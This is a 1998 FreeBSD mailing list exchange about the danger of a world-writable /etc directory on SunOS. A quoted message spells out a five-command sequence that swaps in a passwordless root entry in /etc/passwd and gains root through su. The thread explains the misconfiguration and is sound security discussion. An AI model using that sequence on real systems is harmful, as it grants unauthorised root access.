From owner-freebsd-questions  Fri Dec 18 06:57:06 1998
Return-Path: <owner-freebsd-questions@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id GAA16904
          for freebsd-questions-outgoing; Fri, 18 Dec 1998 06:57:06 -0800 (PST)
          (envelope-from owner-freebsd-questions@FreeBSD.ORG)
Received: from pobox.com (kronos-2-178.mdm.mkt.execpc.com [169.207.86.116])
          by hub.freebsd.org (8.8.8/8.8.8) with SMTP id GAA16474
          for <questions@FreeBSD.ORG>; Fri, 18 Dec 1998 06:53:54 -0800 (PST)
          (envelope-from hamilton@pobox.com)
Message-Id: <199812181453.GAA16474@hub.freebsd.org>
Received: (qmail 11685 invoked from network); 18 Dec 1998 08:50:26 -0600
Received: from localhost (HELO pobox.com) (127.0.0.1)
  by localhost with SMTP; 18 Dec 1998 08:50:26 -0600
To: "Bond, Jeffery" <Jeff.Bond@nectech.co.uk>
cc: "'FreeBSD questions'" <questions@FreeBSD.ORG>,
        "'cjc@cc942873-a.ewndsr1.nj.home.com'" <cjc@cc942873-a.ewndsr1.nj.home.com>
Subject: Re: Basic Security Question 
In-reply-to: Your message of "Fri, 18 Dec 1998 09:54:54 GMT."
             <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 18 Dec 1998 08:50:26 -0600
From: Jon Hamilton <hamilton@pobox.com>
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG


In message <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk>, "Bo
nd, Jeffery" wrote:
} >Mark Ovens wrote,
} >
} >> and on all the Sparcs running SunOS4.1.3_U1 here are:
} >> 
} >> gppsun4:/{8}% ls -ldug etc
} >> drwxrwsrwx 10 bin      staff        2048 Dec 17 09:30 etc
} >> 
} >> which is even less secure as it's writable by all!
} >
} >I may be dense. Is that some kind of joke or something? As dense as I
} >am, I know for sure that even I could take any account on a system
} >with permissions like that and have control of root in this many
} >keystrokes:
} >
} >% cd /etc
} >% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
} >% mv passwd passwd.old
} >% mv passwd.new passwd
} >% su
} >#
} 
} Just because the directory is writable, this doesnt mean the existing files
} in it are too. You won't be able to do 'mv passwd passwd.old'. 

That's a common misconception.  To move (or remove) a file, all you need 
is write and execute permission for the directory containing the file.  
Try it yourself and see.

-- 
   Jon Hamilton  
   hamilton@pobox.com


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message